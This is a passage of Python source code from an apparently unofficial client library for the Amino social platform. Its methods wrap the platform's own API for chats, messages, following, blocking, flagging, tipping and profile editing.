- **Success** : :meth:`Chat List <amino.lib.src.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.ThreadList(json.loads(response.text)["threadList"]).ThreadList
def get_chat_thread(self, chatId: str):
"""
Get the Chat Object from an Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.src.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Thread(json.loads(response.text)["thread"]).Thread
def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["memberList"]).UserProfileList
def join_chat(self, chatId: str):
"""
Join an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def leave_chat(self, chatId: str):
"""
Leave an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def start_chat(self, userId: [str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
Start an Chat with an User or List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType()
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def invite_to_chat(self, userId: [str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
if allowRejoin: allowRejoin = 1
if not allowRejoin: allowRejoin = 0
response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
List of Messages from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.src.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
response = requests.get(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetMessages(json.loads(response.text)).GetMessages
def get_message_info(self, chatId: str, messageId: str):
"""
Information of an Message from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.src.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Message(json.loads(response.text)["message"]).Message
def get_community_info(self, comId: str):
"""
Information of an Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.src.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Community(json.loads(response.text)["community"]).Community
def search_community(self, aminoId: str):
"""
Search a Community byt its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.src.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
response = json.loads(response.text)["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.src.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.src.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.src.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.VisitorsList(json.loads(response.text)).VisitorsList
def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.src.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
response = requests.get(f"{self.api}/g/s/blog/{blogId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetBlogInfo(json.loads(response.text)).GetBlogInfo
elif wikiId:
response = requests.get(f"{self.api}/g/s/item/{wikiId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetWikiInfo(json.loads(response.text)).GetWikiInfo
elif fileId:
response = requests.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.SharedFolderFile(json.loads(response.text)["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
if blogId or quizId:
if quizId is not None: blogId = quizId
response = requests.get(f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.get(f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif fileId: response = requests.get(f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["blockerUidList"]
def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
List of Wall Comments of an User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.src.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
- **mentionUserIds** : List of User IDS to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff: response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=self.parse_headers(), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: str = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
Send a Message to a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Url of the Background Image of the Chat.
- **announcement** : Announcement of the Chat.
- **pinAnnouncement** : If the Chat Announcement should Pinned or not.
- **coHosts** : List of User IDS to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
- **doNotDisturb** : If the Chat should Do Not Disturb or not.
- **pinChat** : If the Chat should Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"] = {"announcement": announcement}
if pinAnnouncement: data["extensions"] = {"pinAnnouncement": pinAnnouncement}
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
if doNotDisturb:
data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not doNotDisturb:
data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if pinChat is not None:
if pinChat:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not pinChat:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if backgroundImage is not None:
data = json.dumps({"media": [100, backgroundImage, None], "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if coHosts is not None:
data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if viewOnly is not None:
if viewOnly:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not viewOnly:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canInvite is not None:
if canInvite:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canInvite:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canTip is not None:
if canTip:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canTip:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
return res
def visit(self, userId: str):
"""
Visit an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(UUID(hexlify(urandom(16)).decode('ascii')))
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
response = requests.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def follow(self, userId: [str, list]):
"""
Follow an User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if isinstance(userId, str):
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unfollow(self, userId: str):
"""
Unfollow an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def block(self, userId: str):
"""
Block an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unblock(self, userId: str):
"""
Unblock an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def join_community(self, comId: str, invitationId: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationId** : ID of the Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationId: data["invitationId"] = invitationId
data = json.dumps(data)
response = requests.post(f"{self.api}/x{comId}/s/community/join", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/x{comId}/s/community/membership-request", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.post(f"{self.api}/x{comId}/s/community/leave", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
response = requests.post(f"{self.api}/x{comId}/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = self.upload_media(icon, "image")
if content: data["content"] = content
if backgroundColor: data["extensions"] = {"style": {"backgroundColor": backgroundColor}}
if backgroundImage: data["extensions"] = {"style": {"backgroundMediaList": [[100, backgroundImage, None, None, None]]}}
if defaultBubbleId: data["extensions"] = {"defaultBubbleId": defaultBubbleId}
data = json.dumps(data)
